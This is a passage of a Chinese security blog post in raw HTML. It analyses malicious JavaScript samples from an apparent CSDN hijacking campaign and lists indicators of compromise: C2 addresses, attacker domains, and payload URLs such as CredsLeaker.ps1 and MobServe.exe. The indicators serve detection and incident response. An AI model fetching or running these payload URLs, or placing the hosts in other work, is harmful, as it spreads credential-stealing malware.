IP 都不一样。</span></p><p><img data-imgfileid="100001407" class="rich_pages wxw-img" data-ratio="0.47607934655775963" data-s="300,640" data-type="png" data-w="3428" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b80e514a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8QqfhQF8NF6plepI1CMEdyWva6llNLiaDsia620DmysG9F3jEcNAqsQicA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001410" class="rich_pages wxw-img" data-ratio="0.26527050610820246" data-s="300,640" data-type="png" data-w="3438" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=513169df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh85anrOYL4vJq5VCW3vKTuLv2zf1iaZlWnVx7xOcBBneXicbnjD6rnXFsQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">对上面红黄框出来的这几个IP进行分析时发现，220.191.249.188 能关联出三个版本的js样本，但是这三个样本似乎都不是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net/func.js" target="_blank">https://sslupdate[.]net/func.js</a></span></code><span leaf="">，因为这个版本的js当中直接内嵌了假冒证书的html，不用再去远端加载，所以里面并不包含 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/func.js" target="_blank">https://update.sslcsdn[.]com/func.js</a></span></code><span leaf=""> ，包含的是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/checkip?ip=" target="_blank">https://update.sslcsdn[.]com/checkip?ip=</a></span></code><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且由于这个js内嵌了BASE64编码后的html，所以有172kb大，而我们拿到的 jquery-statistics.js 才8kb。</span></p><p><img data-imgfileid="100001409" class="rich_pages wxw-img" data-ratio="0.22849695916594265" data-s="300,640" data-type="png" data-w="2302" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=865b2de5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8GTfm3qYHqxaXIh4rKQ3Bws4udjT9w2iaMiabEhLK1KnonFrOeOW5apXw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">220.191.249.188 关联出的三个 js 当中都是带有 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/func.js" target="_blank">https://update.sslcsdn[.]com/func.js</a></span></code><span leaf="">  的版本。</span></p><p><img data-imgfileid="100001408" class="rich_pages wxw-img" data-ratio="0.34202898550724636" data-s="300,640" data-type="png" data-w="1380" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=193c80d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8xEW6ayIIZibAtrJOBpaVLfQsUhD6h16HFs8ibIf7ePQkBuPIibl0JGjzQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索这些 IP 可以发现有多个不同的 js 样本，猜测可能是在有部分IP上线之后，攻击者调整js当中的IP地址导致的版本更新？</span></p><p><img data-imgfileid="100001411" class="rich_pages wxw-img" data-ratio="0.24007060900264784" data-s="300,640" data-type="png" data-w="2266" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6f734cc2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8VgsCQAEbULd8UV4JBYJtS1sgiaO3n1UAaiccgUoDrbqur8kwcA4XQAiaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是 106.39.147.146 可以关联到 9 月份和 10 月份的 js，说明它可能是处于比较前期的受害者（或攻击者本人测试）。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">所以说如果不是攻击者自己上传 VT 测试免杀的话，实际用于攻击的 js 很可能是多版本的，IP出口不在名单里有可能是已经中招了被删掉了，</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">或者攻击者拿到了新的目标 IP 不断往 js 当中新增，动态调整攻击目</span></strong><span leaf="">标。<img data-imgfileid="100001413" class="rich_pages wxw-img" data-ratio="0.3826955074875208" data-s="300,640" data-type="png" data-w="2404" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=22957989&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8hOXjSKR0AHKBm0FVKKvjFfXZDbvpZ4kicyqRJdaNWYYMiay4UWZpBllA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">有的 js 样本可以关联出 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://analyze.sogoudoc[.]com/func.js" target="_blank">https://analyze.sogoudoc[.]com/func.js</a></span></code></p><p><img data-imgfileid="100001412" class="rich_pages wxw-img" data-ratio="0.2549246813441483" data-s="300,640" data-type="png" data-w="1726" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=9a3a4a1a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8h8qia4hTRNCd4JDgwWnOucPicByxpNrmjO7c2Z4Thl3BUdmPvTB7lNGg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">不过这部分分析很难得出什么起决定性作用的结论，只是根据 IP 的包含情况做的推测。</span></p><hr style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: solid;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 1px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: 1px;"/><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">第一部分先发到这里，未完待续。</span></p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 22px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">IOC</span></span><span style="display: none;"></span></h2><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">为了方便用得上的人正常放假过年，就先把所有的 ioc 发出来了，有的 ioc 文章的 “剧情推进” 可能还没有关联到。</span></p><hr style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: solid;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 1px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: 1px;"/><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">C2 木马通信 ioc，有连接基本可以肯定已经被控，这部分比较适合 NTA 设备回溯。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">107.148.61.185:8084</span><span leaf=""><br/></span><span leaf="">45.205.2.101:8848</span><span leaf=""><br/></span><span leaf="">103.112.98.83:8848</span><span leaf=""><br/></span><span leaf="">116.213.40.186:8848</span><span leaf=""><br/></span><span leaf="">107.148.62.90:8084</span><span leaf=""><br/></span><span leaf="">38.47.220.216:8848</span><span leaf=""><br/></span><span leaf="">154.19.200.133:8087</span><span leaf=""><br/></span><span leaf="">107.148.62.100:8084</span><span leaf=""><br/></span><span leaf="">154.19.200.133:8086</span><span leaf=""><br/></span><span leaf="">107.148.61.127:8084</span><span leaf=""><br/></span><span leaf="">47.242.214.157:8084</span><span leaf=""><br/></span><span leaf="">107.148.50.237:8084</span><span leaf=""><br/></span><span leaf="">8.217.208.228:8084</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">奇安信 《最大IT社区CSDN被挂马，CDN可能是罪魁祸首？》文章中的 ioc 重发，有些目前还活着。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">update.sslcsdn.com</span><span leaf=""><br/></span><span leaf="">fix-ssl.com</span><span leaf=""><br/></span><span leaf="">47.243.177.243:443</span><span leaf=""><br/></span><span leaf="">analyze.sogoudoc.com</span><span leaf=""><br/></span><span leaf="">107.148.62.90:443</span><span leaf=""><br/></span><span leaf="">107.148.61.185:8084</span><span leaf=""><br/></span><span leaf="">8.217.107.66:443</span><span leaf=""><br/></span><span leaf="">csdnssl.com</span><span leaf=""><br/></span><span leaf="">sogoucache.com</span><span leaf=""><br/></span><span leaf="">sslcsdn.com</span><span leaf=""><br/></span><span leaf="">sogoudoc.com</span><span leaf=""><br/></span><span leaf="">flash-update.com</span><span leaf=""><br/></span><span leaf="">centos.ws</span><span leaf=""><br/></span><span leaf="">45.205.2.101:8848</span><span leaf=""><br/></span><span leaf="">103.112.98.83:8848</span><span leaf=""><br/></span><span leaf="">sslupdate.org</span><span leaf=""><br/></span><span leaf="">analyzev.oss-cn-beijing.aliyuncs.com</span><span leaf=""><br/></span><span leaf="">updateboot.com</span><span leaf=""><br/></span><span leaf="">ntpfix.com</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">追踪恶意样本过程涉及到的网络 ioc（仅样本关联），有些可能是无差别钓鱼的类型关联到的，也可能有重复，所以这部分噪音比较大。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLVqWiaaeT9kOQEt2bfEia4W7EoRzXmp7eqgMuAhxs2rWvP3tTPOtKEWS2EDsutXDwiabibvp9ugMDUyr/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">45.205.2.101:8848 (server.centos.ws)</span><span leaf=""><br/></span><span leaf=""><a href="https://fix-ssl.com/aliyunoss" target="_blank">https://fix-ssl.com/aliyunoss</a></span><span leaf=""><br/></span><span leaf=""><a href="https://update.sslcsdn.com/runstream" target="_blank">https://update.sslcsdn.com/runstream</a></span><span leaf=""><br/></span><span leaf="">47.243.177.243:443 (update.sslcsdn.com)</span><span leaf=""><br/></span><span leaf="">107.148.62.90:443 (fix-ssl.com)</span><span leaf=""><br/></span><span leaf=""><a href="https://analyzev.oss-cn-beijing.aliyuncs.com/aliyunossinternal" target="_blank">https://analyzev.oss-cn-beijing.aliyuncs.com/aliyunossinternal</a></span><span leaf=""><br/></span><span leaf="">server.centos.ws</span><span leaf=""><br/></span><span leaf="">116.213.40.186:8848</span><span leaf=""><br/></span><span leaf="">8.141.181.246:443 (analyzev.oss-cn-beijing.aliyuncs.com)</span><span leaf=""><br/></span><span leaf="">107.148.62.90:8084 (fix-ssl.com)</span><span leaf=""><br/></span><span leaf=""><a href="https://update.sslcsdn.com/run" target="_blank">https://update.sslcsdn.com/run</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.7zei.com/wasdsfas" target="_blank">https://www.7zei.com/wasdsfas</a></span><span leaf=""><br/></span><span leaf="">154.19.200.214:443 (www.7zei.com)</span><span leaf=""><br/></span><span leaf=""><a href="http://154.19.200.133:8087/count" target="_blank">http://154.19.200.133:8087/count</a> [POST]</span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/MobServe.exe" target="_blank">https://scrt1.nyazz.com/MobServe.exe</a></span><span leaf=""><br/></span><span leaf=""><a href="https://ssh.0523qyfw.com/MobServe.dll" target="_blank">https://ssh.0523qyfw.com/MobServe.dll</a></span><span leaf=""><br/></span><span leaf="">216.83.52.145:443 (scrt1.nyazz.com)</span><span leaf=""><br/></span><span leaf="">216.83.52.155:443 (ssh.0523qyfw.com)</span><span leaf=""><br/></span><span leaf="">154.19.200.133:8087</span><span leaf=""><br/></span><span leaf="">107.148.62.100:8084</span><span leaf=""><br/></span><span leaf=""><a href="http://154.19.200.133:8086" target="_blank">http://154.19.200.133:8086</a></span><span leaf=""><br/></span><span leaf=""><a href="https://m.7zei.com/CredsLeaker.ps1" target="_blank">https://m.7zei.com/CredsLeaker.ps1</a></span><span leaf=""><br/></span><span leaf=""><a href="https://m.7zei.com/update.ps1" target="_blank">https://m.7zei.com/update.ps1</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.fix-ssl.com/startup.ps1" target="_blank">https://www.fix-ssl.com/startup.ps1</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.7zei.com/cl_reader.php" target="_blank">https://www.7zei.com/cl_reader.php</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.7zei.com/config.cl" target="_blank">https://www.7zei.com/config.cl</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt.95271.pw/chrome.php" target="_blank">https://scrt.95271.pw/chrome.php</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/Mobnew64new.bin" target="_blank">https://scrt1.nyazz.com/Mobnew64new.bin</a></span><span leaf=""><br/></span><span leaf="">scrt.nyazz.com</span><span leaf=""><br/></span><span leaf="">107.148.62.100</span><span leaf=""><br/></span><span leaf="">118.107.29.172 (scrt1.nyazz.com)</span><span leaf=""><br/></span><span leaf=""><a href="https://ssh.0523qyfw.com/winscp" target="_blank">https://ssh.0523qyfw.com/winscp</a></span><span leaf=""><br/></span><span leaf="">216.83.52.155 (ssh.0523qyfw.com)</span><span leaf=""><br/></span><span leaf="">107.148.62.100:8084 (107.148.62.100)</span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/dfMob2" target="_blank">https://scrt1.nyazz.com/dfMob2</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/pslist64mob.dll" target="_blank">https://scrt1.nyazz.com/pslist64mob.dll</a></span><span leaf=""><br/></span><span leaf="">scrt.95271.pw</span><span leaf=""><br/></span><span leaf="">118.107.29.172:443 (scrt1.nyazz.com)</span><span leaf=""><br/></span><span leaf=""><a href="http://107.148.62.100:8084/?a=w64&amp;h=107.148.62.100&amp;t=ws_&amp;p=8084" target="_blank">http://107.148.62.100:8084/?a=w64&amp;h=107.148.62.100&amp;t=ws_&amp;p=8084</a></span><span leaf=""><br/></span><span leaf=""><a href="http://107.148.62.100:8084/" target="_blank">http://107.148.62.100:8084/</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.61xdm.com/wmob" target="_blank">https://www.61xdm.com/wmob</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.i5iii.com/insert" target="_blank">https://www.i5iii.com/insert</a></span><span leaf=""><br/></span><span leaf="">107.148.51.200:443 (www.61xdm.com)</span><span leaf=""><br/></span><span leaf="">GET <a href="http://107.148.62.100:8084/" target="_blank">http://107.148.62.100:8084/</a> 101</span><span leaf=""><br/></span><span leaf=""><a href="https://ssh.0523qyfw.com/mamami" target="_blank">https://ssh.0523qyfw.com/mamami</a></span><span leaf=""><br/></span><span leaf="">107.148.61.127:8084</span><span leaf=""><br/></span><span leaf="">ssh.0523qyfw.com</span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/SecureCrtServe.exe" target="_blank">https://scrt1.nyazz.com/SecureCrtServe.exe</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/dfSrc1" target="_blank">https://scrt1.nyazz.com/dfSrc1</a></span><span leaf=""><br/></span><span leaf=""><a href="https://scrt1.nyazz.com/pslist64.dll" target="_blank">https://scrt1.nyazz.com/pslist64.dll</a></span><span leaf=""><br/></span><span leaf="">107.148.61.127</span><span leaf=""><br/></span><span leaf="">216.83.52.155</span><span leaf=""><br/></span><span leaf=""><a href="http://47.242.214.157:8084/" target="_blank">http://47.242.214.157:8084/</a></span><span leaf=""><br/></span><span leaf=""><a href="http://47.242.214.157:8084/?a=w64&amp;h=47.242.214.157&amp;t=ws_&amp;p=8084" target="_blank">http://47.242.214.157:8084/?a=w64&amp;h=47.242.214.157&amp;t=ws_&amp;p=8084</a></span><span leaf=""><br/></span><span leaf=""><a href="https://www.61xdm.com/47" target="_blank">https://www.61xdm.com/47</a></span><span leaf=""><br/></span><span leaf=""><a href="http://47.242.214.157/aliyunoss1111" target="_blank">http://47.242.214.157/aliyunoss1111</a></span><span leaf=""><br/></span><span leaf="">47.242.214.157:80</span><span leaf=""><br/></span><span leaf="">47.242.214.157:8084</span><span leaf=""><br/></span><span leaf="">107.148.62.90:8084</span><span leaf=""><br/></span><span leaf="">154.19.200.214:443</span><span leaf=""><br/></span><span leaf="">www.7zei.com</span><span leaf=""><br/></span><span leaf="">m.7zei.com</span><span leaf=""><br/></span><span leaf="">216.83.52.145:443</span><span leaf=""><br/></span><span leaf="">scrt1.nyazz.com</span><span leaf=""><br/></span><span leaf="">216.83.52.155:443</span><span leaf=""><br/></span><span leaf="">118.107.29.172:443</span><span 